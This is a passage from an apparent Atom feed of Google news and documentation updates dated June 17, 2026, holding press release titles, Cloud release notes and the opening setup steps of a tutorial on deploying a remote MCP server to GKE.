    <id>https://googlecloudpresscorner.com/2026-06-17-HSBC-AND-GOOGLE-CLOUD-ANNOUNCE-TRANSFORMATIVE-AI-BANKING-PARTNERSHIP</id>
    <title>HSBC AND GOOGLE CLOUD ANNOUNCE TRANSFORMATIVE AI BANKING PARTNERSHIP</title>
    <updated>2026-06-17T07:01:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-06-17-HSBC-AND-GOOGLE-CLOUD-ANNOUNCE-TRANSFORMATIVE-AI-BANKING-PARTNERSHIP" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-17T07:01:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-17-HSBC-AND-GOOGLE-CLOUD-ANNOUNCE-TRANSFORMATIVE-AI-BANKING-PARTNERSHIP</id>
    <title>HSBC AND GOOGLE CLOUD ANNOUNCE TRANSFORMATIVE AI BANKING PARTNERSHIP</title>
    <updated>2026-06-17T07:01:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-17-HSBC-AND-GOOGLE-CLOUD-ANNOUNCE-TRANSFORMATIVE-AI-BANKING-PARTNERSHIP" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-17T07:01:00+00:00</published>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-06-17-Deloitte-and-Google-Cloud-Collaborate-to-Launch-London-AI-Studio-to-Spearhead-UKs-Transition-to-Agentic-AI</id>
    <title>Deloitte and Google Cloud Collaborate to Launch London AI Studio to Spearhead UK's Transition to Agentic AI</title>
    <updated>2026-06-17T07:00:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-06-17-Deloitte-and-Google-Cloud-Collaborate-to-Launch-London-AI-Studio-to-Spearhead-UKs-Transition-to-Agentic-AI" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-17T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_17_2026</id>
    <title>Cloud Release Notes — June 17, 2026</title>
    <updated>2026-06-17T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can enable &lt;a href="https://docs.cloud.google.com/bigquery/docs/autonomous-embedding-generation"&gt;autonomous embedding
generation&lt;/a&gt; on new or existing
tables that you make with the &lt;a href="https://docs.cloud.google.com/bigquery/docs/autonomous-embedding-generation#create_an_automatically_generated_embedding_column"&gt;&lt;code&gt;CREATE
TABLE&lt;/code&gt;&lt;/a&gt;
or &lt;a href="https://docs.cloud.google.com/bigquery/docs/autonomous-embedding-generation#add_an_automatically_generated_embedding_column_to_an_existing_table"&gt;&lt;code&gt;ALTER
TABLE&lt;/code&gt;&lt;/a&gt;
statements. When you do this, BigQuery maintains a column of embeddings on the
table based on a source column. When you add or modify data in the source
column, BigQuery automatically generates or updates the embedding column for
that data.&lt;/p&gt;
&lt;p&gt;This feature is
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available&lt;/a&gt;
(GA).&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Billing&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;CUD dashboard redesign available (preview)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The redesigned CUD dashboard is available in the Billing section of the
Google Cloud console. It provides a consolidated view of all your resource-based
and spend-based CUDs in a single place. The new design improves usability and
scalability, helping you find information faster.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/billing/docs/how-to/cuds-list-overview"&gt;View your commitments&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Storage&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;When you &lt;a href="https://docs.cloud.google.com/storage/docs/composing-objects"&gt;create composite objects&lt;/a&gt;, you can
delete the temporary source objects as part of the composition process.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: Create and manage skills (GA with allowlist)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can create, import, update, and use skills in the Gemini Enterprise
web app. Skills are reusable custom instructions that help the assistant
perform specific tasks.&lt;/p&gt;
&lt;p&gt;This feature is available as a GA with allowlist. To access this feature,
contact your Google account manager. After your Google Cloud project is added to
the allowlist, a Gemini Enterprise administrator must turn on the &lt;strong&gt;Enable skills&lt;/strong&gt;
toggle in the web app feature management settings to let users use it.&lt;/p&gt;
&lt;p&gt;For more information, see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/manage-web-app-features"&gt;Manage web app
features&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/skills"&gt;Create and manage
skills&lt;/a&gt; (You need to be on the allowlist to access the page.)&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: Gemini Enterprise app for Slack&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Gemini Enterprise administrators can integrate Gemini Enterprise with Slack to
deliver AI-powered answers and search directly to users in their Slack
workspace. Once integrated, users can interact with Gemini Enterprise through
direct messages, slash commands, and channel mentions to receive answers that
incorporate data from all connected data stores.&lt;/p&gt;
&lt;p&gt;This feature is generally available (GA). For more information, see
&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/configure-slack-app"&gt;Configure the Gemini Enterprise app for
Slack&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise Agent Platform&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Memory Bank and Sessions global and multi-regional endpoints GA&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Memory Bank and Sessions support for multi-regional and global endpoints is now
in General Availability (GA). For more information, see
&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/resources/agent-locations#multi-regional-and-global-endpoints"&gt;Supported locations for agents&lt;/a&gt;. Note that
Customer-Managed Encryption Keys (CMEK) cannot be used if your Memory Bank
or Sessions instance is configured to use the global endpoint.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Distributed Cloud (software only) for VMware&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;We are experiencing a delay preventing patch releases for GDC software
only for VMware. We are working diligently to resolve this issue. We will post
updates here with more information as it becomes available.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Auto-collapse setting for the query editor&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can now configure the query editor to automatically collapse after you run
a search, maximizing the screen space available for viewing your search results.
By default, the query editor remains expanded.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/udm-search#CollapsequeryEditor"&gt;Configure query editor behavior&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps Marketplace&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Secret Manager&lt;/strong&gt;: Version 1.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;New &lt;strong&gt;Secret Manager&lt;/strong&gt; integration.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Source code is now publicly available on &lt;a href="https://github.com/chronicle/content-hub"&gt;GitHub&lt;/a&gt;
for the following integrations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;AlienVault USM Appliance&lt;/strong&gt;: Version 29.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;AlienVaultTI&lt;/strong&gt;: Version 15.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Arcsight&lt;/strong&gt;: Version 46.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Axonius&lt;/strong&gt;: Version 8.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;BMC Helix Remedyforce&lt;/strong&gt;: Version 18.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cisco AMP&lt;/strong&gt;: Version 24.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;EasyVista&lt;/strong&gt;: Version 8.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Mandiant&lt;/strong&gt;: Version 10.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Office 365 Management API&lt;/strong&gt;: Version 11.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;SCCM&lt;/strong&gt;: Version 22.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;SonicWall-Beta&lt;/strong&gt;: Version 9.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Stellar Cyber Starlight&lt;/strong&gt;: Version 19.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Symantec Email Security.Cloud&lt;/strong&gt;: Version 6.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Twilio&lt;/strong&gt;: Version 16.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;XForce&lt;/strong&gt;: Version 20.0&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Zabbix&lt;/strong&gt;: Version 17.0&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Google Chronicle&lt;/strong&gt;: Version 86.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where the connector would idle or hang on heartbeats instead of 
breaking early when &lt;code&gt;nextPageToken&lt;/code&gt; or &lt;code&gt;nextPageStartTime&lt;/code&gt; is received, and 
updated ontology mapping in the following connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Chronicle Alerts Connector&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Palo Alto Cortex XDR&lt;/strong&gt;: Version 29.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Updated host name extraction logic in the raw payload in the following 
connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Palo Alto Cortex XDR Connector&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SIEM&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Auto-collapse setting for the query editor&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can now configure the query editor to automatically collapse after you run
a search, maximizing the screen space available for viewing your search results.
By default, the query editor remains expanded.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/udm-search#CollapsequeryEditor"&gt;Configure query editor behavior&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Memorystore for Redis&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Memorystore for Redis supports the &lt;a href="https://docs.cloud.google.com/products#product-launch-stages"&gt;General Availability&lt;/a&gt;
of the following health issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/memorystore/docs/redis/expensive-commands"&gt;&lt;strong&gt;Expensive commands&lt;/strong&gt;&lt;/a&gt;:
resolve performance issues that are associated with using Redis commands that
are resource-intensive (expensive).&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/memorystore/docs/redis/high-resource-utilization"&gt;&lt;strong&gt;High resource utilization&lt;/strong&gt;&lt;/a&gt;:
resolve issues that are associated with instances not performing optimally.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/memorystore/docs/redis/maintenance-policy-not-set"&gt;&lt;strong&gt;Maintenance policy not set&lt;/strong&gt;&lt;/a&gt;:
check whether users set maintenance windows for instances. If there's an optimal
time slot for the maintenance windows when there's low traffic, then the health
issue provides this slot.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Service Extensions&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Support for the &lt;a href="https://docs.cloud.google.com/service-extensions/docs/callouts-overview#ext-authz"&gt;&lt;code&gt;ext_authz&lt;/code&gt; Envoy gRPC API
protocol&lt;/a&gt;
is now &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available
(GA)&lt;/a&gt; for regional
external Application Load Balancers and regional internal
Application Load Balancers.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_17_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-17T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developer.chrome.com/blog/new-in-webgpu-149-150?hl=en</id>
    <title>What's New in WebGPU (Chrome 149-150)</title>
    <updated>2026-06-17T07:00:00+00:00</updated>
    <content type="html">Immediates and stricter validation for transient attachments.</content>
    <link href="https://developer.chrome.com/blog/new-in-webgpu-149-150?hl=en" rel="alternate"/>
    <category term="Chrome for Developers"/>
    <published>2026-06-17T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-17-THG-Ingenuity-Launches-AI-Shopping-Assistant-in-Collaboration-with-Google-Cloud,-Driving-8x-Higher-Conversions</id>
    <title>THG Ingenuity Launches AI Shopping Assistant in Collaboration with Google Cloud, Driving 8x Higher Conversions</title>
    <updated>2026-06-17T07:00:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-17-THG-Ingenuity-Launches-AI-Shopping-Assistant-in-Collaboration-with-Google-Cloud,-Driving-8x-Higher-Conversions" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-17T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-17-Deloitte-and-Google-Cloud-Collaborate-to-Launch-London-AI-Studio-to-Spearhead-UKs-Transition-to-Agentic-AI</id>
    <title>Deloitte and Google Cloud Collaborate to Launch London AI Studio to Spearhead UK's Transition to Agentic AI</title>
    <updated>2026-06-17T07:00:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-17-Deloitte-and-Google-Cloud-Collaborate-to-Launch-London-AI-Studio-to-Spearhead-UKs-Transition-to-Agentic-AI" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-17T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/google-cloud-summit-london-2026/</id>
    <title>Scaling the UK government’s AI vision</title>
    <updated>2026-06-17T07:00:00+00:00</updated>
    <content type="html">An abstract digital design of four angled, colorful rounded capsule shapes and a small sphere over a black background.</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/google-cloud-summit-london-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-17T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-17-Google-Clouds-Model-Garden-at-Platform-37-An-Exclusive-Customer-Hub-for-AI-Innovation-and-Collaboration</id>
    <title>Google Cloud's Model Garden at Platform 37: An Exclusive Customer Hub for AI Innovation and Collaboration</title>
    <updated>2026-06-17T06:55:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-17-Google-Clouds-Model-Garden-at-Platform-37-An-Exclusive-Customer-Hub-for-AI-Innovation-and-Collaboration" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-17T06:55:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-16-Google-Cloud-Strengthens-Data-Sovereignty-for-Korean-Organizations-with-the-Launch-of-Google-Security-Operations-in-the-Seoul-Region</id>
    <title>Google Cloud Strengthens Data Sovereignty for Korean Organizations with the Launch of Google Security Operations in the Seoul Region</title>
    <updated>2026-06-17T02:00:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-16-Google-Cloud-Strengthens-Data-Sovereignty-for-Korean-Organizations-with-the-Launch-of-Google-Security-Operations-in-the-Seoul-Region" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-17T02:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/search/updates#june-2026</id>
    <title>Site move guidance now includes information on domain variants</title>
    <updated>2026-06-17T00:00:00+00:00</updated>
    <content type="html">&lt;p&gt;
          &lt;b&gt;What&lt;/b&gt;: The &lt;a href="https://developers.google.com/search/docs/crawling-indexing/site-move-with-url-changes"&gt;site move guide&lt;/a&gt;
          now includes information on using the Change of Address tool for all subdomain variants
          (including www and non-www) during domain migrations.
        &lt;/p&gt;&lt;p&gt;
          &lt;b&gt;Why&lt;/b&gt;: The domain migrations work best when all variants of a site are migrated properly.
        &lt;/p&gt;</content>
    <link href="https://developers.google.com/search/updates#june-2026" rel="alternate"/>
    <category term="Search Central Docs"/>
    <published>2026-06-17T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/build-and-deploy-a-remote-mcp-server-to-gke-in-30-minutes</id>
    <title>Build and Deploy a Remote MCP Server to GKE in 30 Minutes</title>
    <updated>2026-06-17T00:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Build and Deploy a Remote MCP Server to GKE in 30 Minutes&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Integrating context from tools and data sources into LLMs can be challenging, which impacts the ease of development for AI agents. To address this challenge, Anthropic introduced the &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io/introduction" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Context Protocol (MCP)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which standardizes how applications provide context to these models. Developers often want to build an MCP server for their APIs to make them available to fellow developers, allowing them to use it as context in their own applications. Google Kubernetes Engine (GKE) provides a scalable, reliable, and secure environment to deploy these remote MCP servers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;This guide shows the straightforward process of setting up a secure remote MCP server on GKE.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;MCP transports&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Model Context Protocol follows a client-server architecture. It initially only supported running the server locally using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;stdio&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; transport. The protocol has since evolved and now supports remote access transports, specifically &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io/specification/latest/basic/transports#streamable-http" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Streamable HTTP&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;With Streamable HTTP, the server operates as an independent process that can handle multiple client connections. This transport uses HTTP POST and GET requests. The server must provide a single HTTP endpoint path that supports both POST and GET methods, such as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://example.com/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. You can learn more about the different transports in the &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io/docs/concepts/architecture#transport-layer" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;official documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Benefits of running an MCP server on GKE&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Running an MCP server remotely on GKE provides several architecture benefits:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Scalability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; GKE Autopilot is built to handle highly variable traffic. Since MCP Servers are stateless, GKE can scale horizontally to handle spikes in demand efficiently.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Centralized access:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Teams can share access to a centralized MCP server, allowing developers to connect from local machines, Agents or pipelines instead of running redundant local servers. Updates to the central server immediately benefit everyone.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced security:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Kubernetes Gateway API combined with SSL certificates provides an easy way to force secure, encrypted traffic. This allows only secure connections to the MCP server, preventing unauthorized access.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Prerequisites&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before starting, ensure the following tools are installed:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;python 3.10 or higher&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;uv (for package and project management, see the &lt;/span&gt;&lt;a href="https://docs.astral.sh/uv/getting-started/installation/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;installation documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud SDK (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;kubectl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command-line tool&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Installation&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prepare environment variables&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;export PROJECT_ID=$(gcloud config get-value project)\r\nexport REGION=us-central1&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d61f0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create a folder, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp-on-gke&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, to store the code for the server and deployment.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;mkdir mcp-on-gke &amp;amp;&amp;amp; cd mcp-on-gke&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d62e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now configure the Google Cloud credentials and set the active project.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud auth login\r\ngcloud config set project $PROJECT_ID&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6220&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Initiate the GKE Autopilot cluster creation in the background. This process takes a few minutes, so starting it now allows the cluster to provision while you complete the rest of the setup. Make sure to use an Autopilot version that ensures &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-compute-classes" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cost-Optimized Compute (CCOP)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is enabled for fast autoscale.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud container clusters create-auto mcp-cluster \\\r\n    --region $REGION \\\r\n    --release-channel rapid \\\r\n    --async&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6b20&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;uv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to create a project, which will generate a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pyproject.toml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv init&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6550&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
